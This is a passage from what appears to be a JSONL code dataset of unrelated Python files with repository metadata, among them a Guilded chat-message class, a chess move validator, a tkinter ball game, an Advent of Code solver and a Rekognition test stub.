f'<@{mentioned[\"id\"]}>'\n\n self.raw_mentions.append(f'<@{mentioned[\"id\"]}>')\n if self.team_id:\n user = self._state._get_team_member(self.team_id, mentioned['id'])\n else:\n user = self._state._get_user(mentioned['id'])\n\n if user:\n self.mentions.append(user)\n else:\n name = mentioned.get('name')\n if mentioned.get('nickname') is True and mentioned.get('matcher') is not None:\n name = name.strip('@').strip(name).strip('@')\n if not name.strip():\n # matcher might be empty, oops - no username is available\n name = None\n if self.team_id:\n self.mentions.append(self._state.create_member(\n team=self.team,\n data={\n 'id': mentioned.get('id'),\n 'name': name,\n 'profilePicture': mentioned.get('avatar'),\n 'colour': parse_hex_number(mentioned.get('color', '000000').strip('#')),\n 'nickname': mentioned.get('name') if mentioned.get('nickname') is True else None,\n 'bot': self.created_by_bot\n }\n ))\n else:\n self.mentions.append(self._state.create_user(data={\n 'id': mentioned.get('id'),\n 'name': name,\n 'profilePicture': mentioned.get('avatar'),\n 'bot': self.created_by_bot\n }))\n elif mentioned['type'] in ('everyone', 'here'):\n # grab the actual display content of the node instead of using a static string\n try:\n content += element['nodes'][0]['leaves'][0]['text']\n except KeyError:\n # give up trying to be fancy and use a static string\n content += f'@{mentioned[\"type\"]}'\n\n elif element['type'] == 'reaction':\n rtext = element['nodes'][0]['leaves'][0]['text']\n content += str(rtext)\n elif element['type'] == 'link':\n link_text = element['nodes'][0]['leaves'][0]['text']\n link_href = element['data']['href']\n link = Link(link_href, name=link_text)\n self.links.append(link)\n if link.url != link.name:\n content += f'[{link.name}]({link.url})'\n else:\n content += link.url\n elif element['type'] == 'channel':\n channel = 
element['data']['channel']\n content += f'<#{channel.get(\"id\")}>'\n\n channel = self._state._get_team_channel(self.team_id, channel.get('id'))\n if channel:\n self.channel_mentions.append(channel)\n\n content += '\\n'\n\n elif node_type == 'markdown-plain-text':\n try:\n content += node['nodes'][0]['leaves'][0]['text']\n except KeyError:\n # probably an \"inline\" non-text node - their leaves are another node deeper\n content += node['nodes'][0]['nodes'][0]['leaves'][0]['text']\n\n if 'reaction' in node['nodes'][0].get('data', {}):\n emoji_id = node['nodes'][0]['data']['reaction']['id']\n emoji = self._state._get_emoji(emoji_id)\n if emoji:\n self.emojis.append(emoji)\n\n elif node_type == 'webhookMessage':\n if node['data'].get('embeds'):\n for msg_embed in node['data']['embeds']:\n self.embeds.append(Embed.from_dict(msg_embed))\n\n elif node_type == 'block-quote-container':\n quote_content = []\n for quote_node in node['nodes'][0]['nodes']:\n if quote_node.get('leaves'):\n text = str(quote_node['leaves'][0]['text'])\n quote_content.append(text)\n\n if quote_content:\n content += '\\n> {}\\n'.format('\\n> '.join(quote_content))\n\n elif node_type in ['image', 'video']:\n attachment = Attachment(state=self._state, data=node)\n self.attachments.append(attachment)\n\n content = content.rstrip('\\n')\n # strip ending of newlines in case a paragraph node ended without\n # another paragraph node\n return content\n\n\nclass ChatMessage(HasContentMixin):\n \"\"\"A message in Guilded.\n\n There is an alias for this class called ``Message``.\n\n .. container:: operations\n\n .. describe:: x == y\n\n Checks if two messages are equal.\n\n .. describe:: x != y\n\n Checks if two messages are not equal.\n\n Attributes\n -----------\n id: :class:`str`\n The message's ID.\n channel: Union[:class:`abc.TeamChannel`, :class:`DMChannel`]\n The channel this message was sent in.\n webhook_id: Optional[:class:`str`]\n The webhook's ID that sent the message, if applicable.\n \"\"\"\n\n __slots__ = (\n '_state',\n '_raw',\n 'channel',\n '_team',\n 'team_id',\n '_author',\n '_webhook',\n 'id',\n 'type',\n 'webhook_id',\n 'channel_id',\n 'author_id',\n 'created_at',\n 'edited_at',\n 'deleted_at',\n '_replied_to',\n 'replied_to_ids',\n 'silent',\n 'private',\n 'content',\n )\n\n def __init__(self, *, state, channel, data, **extra):\n super().__init__()\n self._state = state\n self._raw = data\n self.channel = channel\n message = data.get('message', data)\n\n self._team = extra.get('team') or extra.get('server')\n self.team_id: Optional[str] = data.get('teamId') or data.get('serverId')\n\n self._author = extra.get('author')\n self._webhook = extra.get('webhook')\n\n if state.userbot:\n self.id: str = data.get('contentId') or message.get('id')\n self.type: MessageType = try_enum(MessageType, message.get('type'))\n self.webhook_id: Optional[str] = data.get('webhookId')\n self.channel_id: str = data.get('channelId') or (channel.id if channel else None)\n self.author_id: str = data.get('createdBy') or message.get('createdBy')\n\n self.created_at: datetime.datetime = ISO8601(data.get('createdAt'))\n self.edited_at: Optional[datetime.datetime] = ISO8601(message.get('editedAt'))\n self.deleted_at: Optional[datetime.datetime] = extra.get('deleted_at') or ISO8601(data.get('deletedAt'))\n\n self._replied_to = []\n self.replied_to_ids: List[str] = message.get('repliesToIds') or message.get('repliesTo') or []\n self.silent: bool = message.get('isSilent', False)\n self.private: bool = message.get('isPrivate', False)\n if 
data.get('repliedToMessages'):\n for message_data in data['repliedToMessages']:\n message_ = self._state.create_message(data=message_data)\n self._replied_to.append(message_)\n else:\n for message_id in self.replied_to_ids:\n message_ = self._state._get_message(message_id)\n if not message_:\n continue\n self._replied_to.append(message_)\n\n self.content: str = self._get_full_content(message['content'])\n\n else:\n self.id: str = message['id']\n self.type: MessageType = try_enum(MessageType, message['type'])\n self.channel_id: str = message['channelId']\n self.content: str = message['content']\n self.embeds: List[Embed] = [Embed.from_dict(embed) for embed in (message.get('embeds') or [])]\n\n self.author_id: str = message.get('createdBy')\n self.webhook_id: Optional[str] = message.get('createdByWebhookId')\n\n self.created_at: datetime.datetime = ISO8601(message.get('createdAt'))\n self.edited_at: Optional[datetime.datetime] = ISO8601(message.get('updatedAt'))\n self.deleted_at: Optional[datetime.datetime] = None\n\n self._replied_to = []\n self.replied_to_ids: List[str] = message.get('replyMessageIds') or []\n self.private: bool = message.get('isPrivate') or False\n self.silent: bool = message.get('isSilent') or False\n\n def __eq__(self, other) -> bool:\n return isinstance(other, ChatMessage) and self.id == other.id\n\n def __repr__(self) -> str:\n return f'<{self.__class__.__name__} id={self.id!r} author={self.author!r} channel={self.channel!r}>'\n\n @property\n def team(self):\n \"\"\"Optional[:class:`.Team`]: The team this message was sent in. ``None`` if the message is in a DM.\"\"\"\n return self._team or self._state._get_team(self.team_id)\n\n @property\n def server(self):\n \"\"\"Optional[:class:`.Team`]: This is an alias of :attr:`.team`.\"\"\"\n return self.team\n\n @property\n def guild(self):\n \"\"\"|dpyattr|\n\n This is an alias of :attr:`.team`.\n \"\"\"\n return self.team\n\n @property\n def author(self):\n \"\"\"Optional[:class:`~.abc.User`]: The user that created this message, if they are cached.\"\"\"\n if self._author:\n return self._author\n\n user = None\n if self.team:\n user = self.team.get_member(self.author_id)\n\n if not user:\n user = self._state._get_user(self.author_id)\n\n if self.webhook_id or self._webhook:\n data = {\n 'id': self.author_id,\n 'type': 'bot',\n }\n if self._webhook:\n data['name'] = self._webhook.name\n data['profilePicture'] = self._webhook.avatar.url if self._webhook.avatar else None\n\n user = self._state.create_user(data=data)\n\n return user\n\n @property\n def created_by_bot(self) -> bool:\n return self.author.bot if self.author else self.webhook_id is not None\n\n @property\n def share_url(self) -> str:\n if self.channel:\n return f'{self.channel.share_url}?messageId={self.id}'\n return None\n\n @property\n def jump_url(self) -> str:\n return self.share_url\n\n @property\n def embed(self):\n return self.embeds[0] if self.embeds else None\n\n @property\n def replied_to(self):\n return self._replied_to or [self._state._get_message(message_id) for message_id in self.replied_to_ids]\n\n async def delete(self, *, delay: Optional[float] = None) -> None:\n \"\"\"|coro|\n\n Delete this message.\n\n Parameters\n -----------\n delay: Optional[:class:`float`]\n If provided, the number of seconds to wait in the background before\n deleting this message. 
If the deletion fails, then it is silently ignored.\n\n Raises\n -------\n Forbidden\n You do not have proper permissions to delete this message.\n NotFound\n This message has already been deleted.\n HTTPException\n Deleting this message failed.\n \"\"\"\n\n if self._state.userbot:\n coro = self._state.delete_message(self.channel_id, self.id)\n else:\n coro = self._state.delete_channel_message(self.channel_id, self.id)\n\n if delay is not None:\n\n async def delete(delay: float):\n await asyncio.sleep(delay)\n try:\n await coro\n except HTTPException:\n pass\n else:\n self.deleted_at = datetime.datetime.utcnow()\n\n asyncio.create_task(delete(delay))\n\n else:\n await coro\n self.deleted_at = datetime.datetime.utcnow()\n\n async def edit(self, *, content: str = None, embed = None, embeds: Optional[list] = None, file = None, files: Optional[list] = None):\n \"\"\"|coro|\n\n Edit this message.\n \"\"\"\n if self._state.userbot:\n payload = {\n 'old_content': self.content,\n 'old_embeds': [embed.to_dict() for embed in self.embeds],\n 'old_files': [await attachment.to_file() for attachment in self.attachments]\n }\n if content:\n payload['content'] = content\n if embed:\n embeds = [embed, *(embeds or [])]\n if embeds is not None:\n payload['embeds'] = [embed.to_dict() for embed in embeds]\n if file:\n files = [file, *(files or [])]\n if files is not None:\n pl_files = []\n for file in files:\n file.type = MediaType.attachment\n if file.url is None:\n await file._upload(self._state)\n pl_files.append(file)\n\n payload['files'] = pl_files\n\n await self._state.edit_message(self.channel_id, self.id, **payload)\n\n else:\n await self._state.update_channel_message(self.channel_id, self.id, content=content)\n\n async def add_reaction(self, emoji):\n \"\"\"|coro|\n\n Add a reaction to this message.\n\n Parameters\n -----------\n :class:`.Emoji`\n The emoji to react with.\n \"\"\"\n if self._state.userbot:\n return await self._state.add_message_reaction(self.channel_id, self.id, emoji.id)\n elif hasattr(emoji, 'id'):\n return await self._state.add_reaction_emote(self.channel_id, self.id, emoji.id)\n else:\n return await self._state.add_reaction_emote(self.channel_id, self.id, emoji)\n\n async def remove_self_reaction(self, emoji):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Remove your reaction to this message.\n\n Parameters\n -----------\n :class:`.Emoji`\n The emoji to remove.\n \"\"\"\n return await self._state.remove_self_message_reaction(self.channel_id, self.id, emoji.id)\n\n async def reply(self, *content, **kwargs):\n \"\"\"|coro|\n\n Reply to a message. Functions the same as\n :meth:`abc.Messageable.send`, but with the ``reply_to`` parameter\n already set.\n \"\"\"\n kwargs['reply_to'] = [self]\n return await self.channel.send(*content, **kwargs)\n\n async def create_thread(self, *content, **kwargs):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Create a thread on this message.\n\n .. 
warning::\n\n This method currently does not work.\n \"\"\"\n kwargs['message'] = self\n return await self.channel.create_thread(*content, **kwargs)\n\n async def pin(self):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Pin this message.\n \"\"\"\n await self._state.pin_message(self.channel.id, self.id)\n\n async def unpin(self):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Unpin this message.\n \"\"\"\n await self._state.unpin_message(self.channel.id, self.id)\n\n async def ack(self, clear_all_badges: bool = False) -> None:\n \"\"\"|coro|\n\n |dpyattr|\n\n |onlyuserbot|\n\n Mark this message's channel as seen; acknowledge all unread messages\n within it.\n\n There is no endpoint for acknowledging just one message and as such\n this method is identical to :meth:`~.abc.Messageable.seen`.\n \"\"\"\n return await self.channel.seen(clear_all_badges=clear_all_badges)\n\nMessage = ChatMessage\n","repo_name":"cosmogonies/VirtualRoleplaying","sub_path":".local/lib/python3.9/site-packages/guilded/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":24669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40557909394","text":"class Solution:\n \"\"\"\n Given an integer array nums and an integer k, return the maximum length of a\nsubarray that sums to k.\n If there is not one, return 0 instead.\n \"\"\"\n\n def maxSubArrayLen(self, nums: List[int], k: int) -> int:\n psums = {}\n S = 0\n best = -float(\"inf\")\n for i, num in enumerate(nums):\n S += num\n psums.setdefault(S, i)\n if S == k:\n best = max(best, i + 1)\n if S - k in psums:\n best = max(i - psums[S - k], best)\n return best if best != -float(\"inf\") else 0\n","repo_name":"QuakerOATI/leetcode","sub_path":"python/max_size_subarray.py","file_name":"max_size_subarray.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41705700244","text":"import sys\n\nfrom cli import menu, rename\nfrom system import *\n\n\n__author__ = 'Wojciech Urbański'\nconfig = None\n\n\n@rename(\"Configure system\")\ndef create_system():\n print(\"Creating system configuration with parameters time = %d, sample_rate = %d\" % (1, 200))\n SystemConfiguration(time=1, sample_rate=200)\n\n\n@rename(\"Quit\")\ndef quit_app():\n raise SystemExit\n\n\ndef main():\n options = [quit_app, create_system]\n menu(\"Main Menu\", options)()\n\n\nif __name__ == '__main__':\n sys.exit(main())","repo_name":"wurbanski/pm-modulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25226442689","text":"#jidskjflsk\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\ns,k=input().split()\ns=int(s)\nk=int(k)\nd=factorial(s)//factorial(k)\nprint(d)\n","repo_name":"Kalaiselvan1503/GuviPlayer","sub_path":"fact_fun.py","file_name":"fact_fun.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40437626043","text":"import json\n\n\ndef loadjson_func(file_url):\n #define variables\n source_file_url =file_url\n target_file_url =\"../Data/output/events_summary.json\"\n\n journeyjson = {}\n journeyjson['Type'] = {}\n journeyjson['Data'] = []\n timetablejson = {}\n timetablejson['Type'] = {}\n timetablejson['Data'] = []\n stopsjson = {}\n stopsjson['Type'] = {}\n 
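# each summary bucket pairs a 'Type' tag with a 'Data' list; the loop below appends one dict per matching event\n    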
stopsjson['Data'] = []\n    #open the file to load for logic checking\n    with open(source_file_url,'r') as json_data:\n        classlist = json.load(json_data)\n        i = 0\n        while i < len(classlist):\n            #load only successful journey posts (statuscode = 201)\n            if classlist[i].get(\"requestMethod\") == 'POST' and 'journey' in classlist[i].get(\"requestUri\"):\n                if classlist[i]['responseStatusCode'] == 201:\n\n                    journeyrequestid = classlist[i].get(\"requestId\")\n                    journeydict = json.loads(classlist[i]['responseContentBody'])\n                    journeyorigin = journeydict['geometry']['coordinates'][0]\n                    journeydestination = journeydict['geometry']['coordinates'][1]\n\n                    requestContentBody = classlist[i]['requestContentBody']\n                    requestTimestamp = classlist[i]['requestTimestamp']\n                    responseContentBody = classlist[i].get(\"responseContentBody\")\n                    responseContentBodydict = json.loads(classlist[i]['responseContentBody'])\n                    journeymodes = responseContentBodydict['only']['modes']\n                    try:\n                        total_travel_time = responseContentBodydict['itineraries'][0]['duration']\n                    except IndexError:\n                        total_travel_time = ''\n                    requestQueryString = classlist[i].get(\"requestQueryString\")\n                    response = classlist[i]['responseStatusCode']\n                    journeyjson['Type'] = \"journey\"\n                    journeyjson['Data'].append({\n                        \"Origin\": journeyorigin,\n                        \"Destination\": journeydestination,\n                        \"Modes_Used\": journeymodes,\n                        \"Total_Travel_Time\": total_travel_time,\n                        \"Timestamp\": requestTimestamp\n                    })\n\n\n\n            #load timetable calls and only successful ones, also logic to exclude lines calls as the uri in some cases was similar to the timetable one\n            elif 'timetables' in classlist[i].get(\"requestUri\") and '/api/lines' not in classlist[i].get(\"requestUri\"):\n                if classlist[i]['responseStatusCode'] == 200:\n                    responseContentBody = classlist[i].get(\"responseContentBody\")\n                    requestQueryString = classlist[i].get(\"requestQueryString\")\n                    response = classlist[i]['responseStatusCode']\n                    requestUri = classlist[i].get(\"requestUri\")\n                    requestTimestamp = classlist[i]['requestTimestamp']\n                    timetabledict = json.loads(classlist[i]['responseContentBody'])\n                    try:\n                        agency_id = timetabledict[0]['line']['agency']['id']\n                    except IndexError:\n                        agency_id = ''\n                    try:\n                        agency_name = timetabledict[0]['line']['agency']['name']\n                    except IndexError:\n                        agency_name = ''\n                    timetablejson['Type'] = \"timetable\"\n                    timetablejson['Data'].append({\n                        \"AgencyName\": agency_name,\n                        \"AgencyID\": agency_id,\n                        \"Timestamp\": requestTimestamp\n                    })\n\n            # load stops calls and only successful ones (statuscode = 200)\n            elif '/api/stops' in classlist[i].get(\"requestUri\"):\n                if classlist[i]['responseStatusCode'] == 200:\n                    requestContentBody = classlist[i].get(\"requestContentBody\")\n                    responseContentBody = classlist[i].get(\"responseContentBody\")\n                    requestQueryString = classlist[i].get(\"requestQueryString\")\n                    requestUri = classlist[i].get(\"requestUri\")\n                    requestTimestamp = classlist[i]['requestTimestamp']\n                    # parse only a non-empty response body; otherwise fall back to an empty dict so the lookups below stay safe\n                    if responseContentBody:\n                        stopsdict = json.loads(responseContentBody)\n                    else:\n                        stopsdict = {}\n                    try:\n                        stops_agency_name = stopsdict['agency']['name']\n                    except KeyError:\n                        stops_agency_name = ''\n                    try:\n                        stops_agency_id = stopsdict['agency']['id']\n                    except KeyError:\n                        stops_agency_id = ''\n                    response = classlist[i]['responseStatusCode']\n                    stopsjson['Type'] = \"stops\"\n                    stopsjson['Data'].append({\n                        \"AgencyName\": stops_agency_name,\n                        \"AgencyID\": stops_agency_id,\n                        \"count\": 1,\n                        \"Timestamp\": requestTimestamp\n                    })\n\n\n\n            i=i+1\n    jsonfinal = [journeyjson, timetablejson, stopsjson]\n    prettyjsonfinal = json.dumps(jsonfinal, 
indent=4)\n\n\n\n    with open(target_file_url, 'a') as targetfile:\n        targetfile.write(prettyjsonfinal)\n    #return the length of the written json string\n    c = len(prettyjsonfinal)\n    return(c)\n\n\n\n\n\n","repo_name":"jaynyoni/hometest","sub_path":"scripts/importjson.py","file_name":"importjson.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39843294818","text":"from Components import Cell, Board\n\n\nclass Chessfigure:\n    _directions = []\n    _color = None\n    _value = None\n    _hasMoved = False\n\n    def __init__(self, color, value):\n        self.set_color(color)\n        self.set_value(value)\n\n    def get_color(self):\n        return self._color\n\n    def set_color(self, value):\n        self._color = value\n\n    def get_value(self):\n        return self._value\n\n    def set_value(self, value):\n        self._value = value\n\n    def moved(self):\n        self._hasMoved = True\n\n    def is_knight(self):\n        if self.__class__.__name__ == \"Knight\":\n            return True\n        return False\n\n    def is_pawn(self):\n        if self.get_value() == 1:\n            return True\n        return False\n\n    def is_move_legal(self, source_cell: Cell, destination_cell: Cell, board: Board) -> bool:\n        try:\n            if source_cell.get_figure().get_color() == destination_cell.get_figure().get_color():\n                return False\n        except AttributeError:\n            pass\n\n        if source_cell.get_figure().is_knight() or source_cell.get_figure().is_pawn():\n            if source_cell.get_figure().is_move_possible(source_cell, destination_cell):\n                return True\n            return False\n\n        if source_cell.get_x() == destination_cell.get_x():\n            if self.check_vertical(source_cell, destination_cell, board):\n                return True\n            return False\n        elif source_cell.get_y() == destination_cell.get_y():\n            if self.check_horizontal(source_cell, destination_cell, board):\n                return True\n            return False\n        else:\n            if self.check_diagonal(source_cell, destination_cell, board):\n                return True\n            return False\n\n    def check_vertical(self, source: Cell, destination: Cell, board: Board) -> bool:\n        stop = abs(source.get_y() - destination.get_y())\n        if source.get_y() < destination.get_y():\n            for y in range(stop):\n                if board[source.get_y() + 1 + y][source.get_x()].get_figure() is not None:\n                    return False\n            return True\n        else:\n            for y in range(stop):\n                if board[source.get_y() - 1 - y][source.get_x()].get_figure() is not None:\n                    return False\n            return True\n\n    def check_horizontal(self, source: Cell, destination: Cell, board: Board) -> bool:\n        stop = abs(source.get_x() - destination.get_x())\n        if source.get_x() < destination.get_x():\n            for x in range(stop):\n                if board[source.get_y()][source.get_x() + 1 + x].get_figure() is not None:\n                    return False\n            return True\n        else:\n            for x in range(stop):\n                if board[source.get_y()][source.get_x() - 1 - x].get_figure() is not None:\n                    return False\n            return True\n\n    def check_diagonal(self, source: Cell, destination: Cell, board: Board) -> bool:\n        stop = abs(source.get_x() - destination.get_x())\n        if source.get_x() < destination.get_x() and source.get_y() < destination.get_y():\n            for xy in range(stop):\n                current_cell = board[source.get_y() + xy + 1][source.get_x() + xy + 1]\n                if current_cell.get_figure() is not None:\n                    if current_cell == destination:\n                        return True\n                    return False\n            return True\n        elif source.get_x() < destination.get_x() and source.get_y() > destination.get_y():\n            for xy in range(stop):\n                current_cell = board[source.get_y() - xy - 1][source.get_x() + xy + 1]\n                if current_cell.get_figure() is not None:\n                    if current_cell == destination:\n                        return True\n                    return 
False\n return True\n elif source.get_x() > destination.get_x() and source.get_y() > destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() - 1 - xy][source.get_x() - 1 - xy]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n elif source.get_x() > destination.get_x() and source.get_y() < destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() + 1 + xy][source.get_x() - 1 - xy]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n","repo_name":"voytech-47/chess","sub_path":"Figures/Chessfigure.py","file_name":"Chessfigure.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5985682450","text":"from tkinter import *\nimport tkinter as tk \n\nimport filetransferapp\n\n\nclass ParentWindow(Frame):\n def __init__(self, master, *args, **kwargs):\n Frame.__init__(self, master, *args, **kwargs)\n\n #define max and min size of frame\n self.master = master\n self.master.minsize(500, 230)\n self.master.maxsize(500, 230)\n # gives the master frame a name\n self.master.title(\"Daily File Transfer\")\n #background color\n self.master.configure(bg=\"lightpink\")\n\n filetransferapp.load_gui(self)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"zoekl7/FileTransferGUI","sub_path":"filetransfermain.py","file_name":"filetransfermain.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6343885467","text":"from tkinter import *\nimport random as rnd\n\nroot = Tk()\nroot.geometry('400x550')\ncanv = Canvas(root, bg = 'white')\ncanv.pack(fill=BOTH, expand=1)\nfield = [400, 500]\nfieldu = [400, 550]\n\npolygon = canv.create_rectangle(0, 0, field[0], field[1])\n\n\nclass Ball:\n default_state = [20, 20, 20, 20]\n default_r = 10\n default_color = 'red'\n def __init__(self, state=default_state, color=default_color, r=default_r):\n self.pos = [state[0], state[1]]\n self.vel = [state[2], state[3]]\n self.color = color\n self.r = r\n self.obj = canv.create_oval(0, 0, 0, 0)\n self.draw_ball()\n\n def draw_ball(self):\n canv.delete(self.obj)\n self.obj = canv.create_oval(\n self.pos[0] - self.r, self.pos[1] - self.r, \n self.pos[0] + self.r, self.pos[1] + self.r, \n fill = self.color)\n\n def move_ball(self, platform):\n self = hit(self, platform)\n self.pos = pos_step(self.pos, self.vel)\n self.vel = vel_step(self.vel, self.pos)\n \n def restart(self):\n self.pos = [self.default_state[0], self.default_state[1]]\n self.vel = [self.default_state[2], self.default_state[3]]\n\n#changes ball's velocity due to the different collisionss\ndef hit(ball, platform):\n ball = platform_hit(ball, platform)\n ball = floor_hit(ball)\n ball = wall_hit(ball)\n return ball\n\n#turnes ball's velocity if it hits the wall\ndef wall_hit(ball):\n if ball.pos[0]-ball.r<= 0 or ball.pos[0]+ball.r >= field[0]:\n ball.vel[0]*=-1\n if ball.pos[1]-ball.r <= 0 or ball.pos[1]+ball.r >= field[1]:\n ball.vel[1]*=-1\n return ball\n\ndef floor_hit(ball):\n if ball.pos[1] >= field[1]:\n ball.vel = [0, 0]\n #the_end(ball)\n return(ball)\n\ndef platform_hit(ball, platform):\n if (ball.pos[1] + ball.r > field[1] - 25 - platform.sizey and\n ball.pos[1] <= field[1]-25 and\n ball.pos[0]>=platform.x and \n 
ball.pos[0]<=platform.x + platform.sizex):\n ball.vel[1]*=-1\n ball.pos[1] = field[1] - 25 - platform.sizey - ball.r\n return(ball)\n\n\n#Draws game over screen \ndef the_end(ball):\n end = canv.create_rectangle(0, 0, field[0], field[1], fill = 'red')\n\n#changes coordinates of the ball along the timeline\ndef pos_step(pos, vel, dt=0.01):\n pos[0]+= vel[0]*dt\n pos[1]+= vel[1]*dt\n return pos\n\n#changes velocity of the ball along the timeline\ndef vel_step(vel, pos, dt=0.01):\n return vel\n\n#================================================\n\nclass Platform:\n def __init__(self, pos=field[0]*0.5, sizey=50, sizex = 10, color='black'):\n self.x = pos\n self.sizey = sizey\n self.sizex = sizex\n self.color = color\n self.draw_platform\n self.obj = canv.create_rectangle(0, 0, 0, 0)\n self.draw_platform()\n\n def draw_platform(self):\n canv.delete(self.obj)\n self.obj = canv.create_rectangle(\n self.x, field[1] - 25, self.x + self.sizey, field[1] - 25 - self.sizex,\n fill = self.color) \n \n def move_platform_right(self):\n self.x = pos_platform_step(self.x, self.sizey)\n def move_platform_left(self):\n self.x = pos_platform_step(self.x, -self.sizey)\n \n\n#=========================\ndef pos_platform_step(pos, vel, dt = 1):\n pos += vel*dt\n return pos\n\n#=========================\n\n\ndef platform_movement_buttons(platform):\n move_platform_right_button = Button(root, \n command = platform.move_platform_right, text = '-->')\n move_platform_left_button = Button(root, \n command = platform.move_platform_left, text = '<--')\n move_platform_right_button.place(x = fieldu[0] - 40, y = fieldu[1] - 40)\n move_platform_left_button.place(x = 0, y = fieldu[1] - 40)\n\ndef restart_buttons(ball, platform):\n btsize = 60\n restart_button = Button(root, command = ball.restart, text = 'ReStArT')\n restart_button.place(x = fieldu[0]/2 - btsize/2, y = fieldu[1] - 40)\n\ndef interface_init(ball, platform):\n restart_buttons(ball, platform)\n platform_movement_buttons(platform)","repo_name":"MakeevVlad/oldschoolgame","sub_path":"kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17780848182","text":"# from tqdm import tqdm\nfrom elf.io import open_file\nfrom cluster_tools.utils.volume_utils import blocks_in_volume, block_to_bb\n\n\ndef debug_vol():\n path = '../data.n5'\n key = 'volumes/cilia/segmentation'\n f = open_file(path)\n ds = f[key]\n shape = ds.shape\n block_shape = ds.chunks\n\n roi_begin = [7216, 12288, 7488]\n roi_end = [8640, 19040, 11392]\n\n blocks, blocking = blocks_in_volume(shape, block_shape, roi_begin, roi_end, return_blocking=True)\n print(\"Have\", len(blocks), \"blocks in roi\")\n\n # check reading all blocks\n for block_id in blocks:\n print(\"Check block\", block_id)\n block = blocking.getBlock(block_id)\n bb = block_to_bb(block)\n d = ds[bb]\n print(\"Have block\", block_id)\n\n print(\"All checks passsed\")\n\n\nif __name__ == '__main__':\n debug_vol()\n","repo_name":"mobie/platybrowser-project","sub_path":"segmentation/cilia/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"73910374970","text":"import typing\n\nimport utils\n\n# EXAMPLE = True\nEXAMPLE = False\n\n\nclass Command(typing.NamedTuple):\n command: str\n output: list[str]\n\n\nclass BaseFile:\n def __init__(self, name):\n self.name = name\n\n @property\n 
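# intentionally abstract: the File and Dir subclasses below supply concrete sizes\n    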
def size(self):\n raise NotImplementedError\n\n\nclass File(BaseFile):\n def __init__(self, name, size):\n super().__init__(name)\n self._size = size\n\n @property\n def size(self):\n return self._size\n\n\nclass Dir(BaseFile):\n def __init__(self, name, contents: list[BaseFile] = None):\n super().__init__(name)\n self._contents = contents or []\n\n @property\n def size(self):\n return sum(child.size for child in self._contents)\n\n def append(self, file: BaseFile):\n self._contents.append(file)\n\n\ndef load_data():\n data = utils.load_data(7, example=EXAMPLE)\n\n commands = []\n\n command = \"\"\n output = []\n\n for line in data:\n if line.startswith(\"$ \"):\n if command:\n commands.append(Command(command, output))\n command = line[2:]\n output = []\n else:\n output.append(line)\n\n if command:\n commands.append(Command(command, output))\n\n return commands\n\n\nDATA = load_data()\n\n\ndef to_path(cwd):\n return \"/\" + \"/\".join(cwd)\n\n\ndef get_dirs() -> dict[str, Dir]:\n cwd = []\n dirs: dict[str, Dir] = {\"/\": Dir(\"/\")}\n\n for command in DATA:\n if command.command == \"cd /\":\n cwd = []\n elif command.command == \"cd ..\":\n cwd.pop()\n elif command.command.startswith(\"cd \"):\n cwd.append(command.command[3:])\n elif command.command.startswith(\"ls\"):\n for line in command.output:\n details, name = line.split(\" \", maxsplit=1)\n if details == \"dir\":\n file = Dir(name)\n dirs[to_path(cwd + [name])] = file\n else:\n file = File(name, int(details))\n dirs[to_path(cwd)].append(file)\n\n return dirs\n\n\ndef part1() -> int:\n dirs = get_dirs()\n\n total = 0\n for dir_ in dirs.values():\n size = dir_.size\n if size <= 100000:\n total += size\n\n return total\n\n\ndef part2() -> int:\n available = 70000000\n need = 30000000\n\n dirs = get_dirs()\n used = dirs[\"/\"].size\n free = available - used\n\n space_needed = need - free\n\n print(used, free, space_needed)\n\n best = available\n for dir_ in dirs.values():\n size = dir_.size\n if size >= space_needed:\n best = min(size, best)\n\n return best\n\n\ndef main() -> None:\n with utils.timed():\n print(f\"Part 1: {part1()}\")\n with utils.timed():\n print(f\"Part 2: {part2()}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apinkney97/aoc","sub_path":"aoc2022/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41268370666","text":"from src.services.rekognition_service import (\n detect_labels,\n process_labels,\n detect_text,\n process_text,\n)\nimport boto3\nfrom botocore.stub import Stubber\n\n\ndef test_detect_labels():\n rekognition = boto3.client(\"rekognition\")\n stubber = Stubber(rekognition)\n\n expected_response = {\n \"Labels\": [{\"Name\": \"Label1\"}, {\"Name\": \"Label2\"}, {\"Name\": \"Label3\"}]\n }\n\n stubber.add_response(\"detect_labels\", 